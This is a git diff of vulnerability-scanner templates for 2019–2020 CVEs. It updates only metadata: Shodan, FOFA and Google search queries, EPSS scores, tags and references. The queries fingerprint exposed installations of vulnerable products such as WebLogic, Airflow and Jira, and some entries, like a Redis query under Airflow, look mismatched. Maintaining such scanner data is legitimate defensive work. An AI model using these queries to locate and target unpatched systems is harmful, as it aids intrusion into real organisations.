a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -26,7 +26,11 @@ info: max-request: 2 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 1d800d541b..65aa34c64b 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_server - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,jira,atlassian http: diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 29957e0fce..9e3dd4def2 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,disclosure,packetstorm http: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 2536b4407f..295bef09db 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_server - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone http: diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index 9428da6afa..d0cf1febb9 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8903 cwe-id: CWE-22 - epss-score: 0.01071 - epss-percentile: 0.82663 + epss-score: 0.01284 + epss-percentile: 0.85758 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 3318dce24d..a54bbaeff7 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -20,16 +20,20 @@ info: cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 - epss-score: 0.00921 - epss-percentile: 0.81203 + epss-score: 0.00477 + epss-percentile: 0.75729 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 5414d13aff..34bce5c76a 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -13,13 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9632 - epss-score: 0.00183 - epss-percentile: 0.54622 + epss-score: 0.05368 + epss-percentile: 0.93097 cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: esafenet - product: electronic_document_security_management_system - fofa-query: title="电子文档安全管理系统" + product: "electronic_document_security_management_system" + fofa-query: "title=\"电子文档安全管理系统\"" tags: cve,cve2019,esafenet,lfi http: diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index fe0cd4bef2..88368f5241 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -29,9 +29,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor http: diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index c96d8eae2f..b7a2539eb5 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -27,7 +27,7 @@ info: product: social_warfare framework: wordpress fofa-query: body="social-warfare" && body="wp-" - tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins + tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 22e9f0934e..953fcd0241 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 - epss-score: 0.97273 - epss-percentile: 0.99841 + epss-score: 0.97265 + epss-percentile: 0.99853 cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 25e0f04b91..ef7f3d4c88 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rconfig product: rconfig - shodan-query: title:"rConfig" + shodan-query: + - title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,packetstorm,rconfig,sqli diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index f3bf88843c..c097bcee0e 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -13,13 +13,15 @@ info: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-10548 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10548 cwe-id: CWE-89 - epss-score: 0.45422 - epss-percentile: 0.97076 + epss-score: 0.38355 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 5546917b8a..e362702a83 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: redhat product: keycloak - shodan-query: http.html:"keycloak" - fofa-query: title="keycloak" + shodan-query: + - http.html:"keycloak" + - http.title:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 848778bd28..1a06464e1a 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -22,14 +22,16 @@ info: cve-id: CVE-2020-10973 cwe-id: CWE-306 epss-score: 0.02524 - epss-percentile: 0.8991 + epss-percentile: 0.90149 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn530hg4_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2020,exposure,wavlink diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 0e6c8904c3..99dbd41fb3 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: glpi-project product: glpi - shodan-query: http.title:"glpi" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2020,redirect,glpi,glpi-project diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 57b6027709..1d3a1f9d19 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -20,14 +20,19 @@ info: cve-id: CVE-2020-11110 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.76153 + epss-percentile: 0.76553 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2020,cve,xss,grafana,hackerone diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 8e5b0394cc..963f73091a 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: superwebmailer product: superwebmailer - shodan-query: title:"SuperWebMailer" + shodan-query: + - title:"SuperWebMailer" + - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" tags: cve,cve2020,rce,superwebmailer diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index db184e8204..d183a3abe4 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: paessler product: prtg_network_monitor - shodan-query: title:"prtg" + shodan-query: + - title:"prtg" + - http.title:"prtg" fofa-query: title="prtg" google-query: intitle:"prtg" tags: cve2020,cve,prtg,disclosure,paessler diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index ff6efdaa32..81af982824 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: mitel product: micollab_audio\,_web_\&_video_conferencing - shodan-query: html:"Mitel" html:"MiCollab" + shodan-query: + - html:"Mitel" html:"MiCollab" + - http.html:"mitel" html:"micollab" fofa-query: body="mitel" html:"micollab" tags: cve,cve2020,packetstorm,mitel,micollab,lfi diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 786452b790..433afbeae1 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -27,9 +27,9 @@ info: vendor: gtranslate product: translate_wordpress_with_gtranslate framework: wordpress - publicwww-query: "/wp-content/plugins/gtranslate" shodan-query: http.html:/wp-content/plugins/gtranslate fofa-query: body=/wp-content/plugins/gtranslate + publicwww-query: "/wp-content/plugins/gtranslate" tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate http: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 0d9cd257c1..4b3f7c5341 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -27,9 +27,18 @@ info: max-request: 4 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2020,cve,packetstorm,apache,airflow,rce,kev http: diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 791f1581fc..7ff44c742d 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: apache product: cocoon - shodan-query: http.html:"Apache Cocoon" + shodan-query: + - http.html:"Apache Cocoon" + - http.html:"apache cocoon" fofa-query: body="apache cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index e675e097b6..ab04c893f2 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wavlink product: wn530h4_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2020,wavlink,exposure diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 2ef7a5398f..8865dab557 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -25,7 +25,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,authenticated,xss diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 3c8e1872fd..7ccf44fab0 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -25,7 +25,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,authenticated,xss diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index b15acb6d9e..daeafc8fac 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2020,cve,vbulletin,sqli,packetstorm http: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 030220caea..cf439bfa51 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -28,8 +28,13 @@ info: max-request: 2 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2020,cve,grafana,ssrf diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 99a739faf3..df7142e1a8 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.html:"microweber" - fofa-query: body="microweber" + shodan-query: + - http.html:"microweber" + - http.favicon.hash:780351152 + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2020,microweber,unauth,disclosure http: diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 92ca22db2a..63019efb04 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -23,7 +23,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,auth-bypass,intrusive diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 1ac48b20e1..0e01c50f26 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/acf-to-rest-api/#developers - https://github.com/airesvsg/acf-to-rest-api - https://nvd.nist.gov/vuln/detail/CVE-2020-13700 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01831 - epss-percentile: 0.86908 + epss-percentile: 0.88233 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index bedcfa1f6d..38d3f8f5cf 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: extremenetworks product: extreme_management_center - shodan-query: title:"Extreme Management Center" + shodan-query: + - title:"Extreme Management Center" + - http.title:"extreme management center" fofa-query: title="extreme management center" google-query: intitle:"extreme management center" tags: cve2020,cve,xss,extremenetworks diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index f193789ad1..8e6a4af6a1 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -16,15 +16,17 @@ info: cvss-score: 8.8 cve-id: CVE-2020-13851 cwe-id: CWE-78 - epss-score: 0.96952 - epss-percentile: 0.99674 + epss-score: 0.96994 + epss-percentile: 0.99737 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: pandorafms product: pandora_fms - shodan-query: title:"Pandora FMS" + shodan-query: + - title:"Pandora FMS" + - http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 45a1234b6f..281b489fdf 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -29,9 +29,18 @@ info: max-request: 1 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 6d90732cdd..381ece6a6c 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -27,8 +27,8 @@ info: max-request: 2 vendor: apache product: apisix - fofa-query: title="apache apisix dashboard" shodan-query: http.title:"apache apisix dashboard" + fofa-query: title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5e498b43ba..bf6c389ceb 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -28,8 +28,14 @@ info: max-request: 7 vendor: gitea product: gitea - shodan-query: html:"Powered by Gitea Version" - fofa-query: body="powered by gitea version" + shodan-query: + - html:"Powered by Gitea Version" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - body="powered by gitea version" + - title="gitea" google-query: intitle:"gitea" tags: cve2020,cve,rce,gitea,authenticated,git,intrusive diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 562498ec4e..1f8af06135 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: atlassian product: jira_data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,exposure,disclosure http: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index bd7e1f4460..2c721a7b20 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 8311477ae9..e2badfa1ba 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve2020,cve,cockpit,agentejo,xss,oss http: diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 41b8fdbff3..559b32d018 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: oracle product: fusion_middleware - shodan-query: http.html:"Weblogic Application Server" - fofa-query: title="weblogic" + shodan-query: + - http.html:"Weblogic Application Server" + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 1d64c775ac..a7aaf3bace 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,rce,weblogic,oast,kev diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 543fa4712c..420a8e3da1 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -28,7 +28,10 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: title:"Oracle PeopleSoft Sign-in" + shodan-query: + - title:"Oracle PeopleSoft Sign-in" + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index e51ec40239..97d7f3ddf6 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-15050 cwe-id: CWE-22 epss-score: 0.55214 - epss-percentile: 0.97597 + epss-percentile: 0.9766 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index b5b5cbee31..00059c17ca 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 - epss-score: 0.00701 - epss-percentile: 0.7816 + epss-score: 0.01168 + epss-percentile: 0.84908 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 46ede2aed9..1b846f0d28 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: nette product: application - fofa-query: app="nette-Framework" + fofa-query: + - app="nette-Framework" + - app="nette-framework" tags: cve2020,cve,nette,rce http: diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 693c16af64..3f30f6d845 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -27,9 +27,11 @@ info: max-request: 7 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 7bc6078884..efcc8a74b2 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: dlink product: dir-816l_firmware - shodan-query: html:"DIR-816L" + shodan-query: + - html:"DIR-816L" + - http.html:"dir-816l" fofa-query: body="dir-816l" tags: cve2020,cve,dlink,xss diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 25fdb97add..4a99bb1cb2 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists http: diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index f78ac0a36d..d7a10bf562 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -28,9 +28,18 @@ info: max-request: 2 vendor: apache product: airflow - fofa-query: Apache Airflow - shodan-query: http.title:"airflow - dags" || http.html:"apache airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + 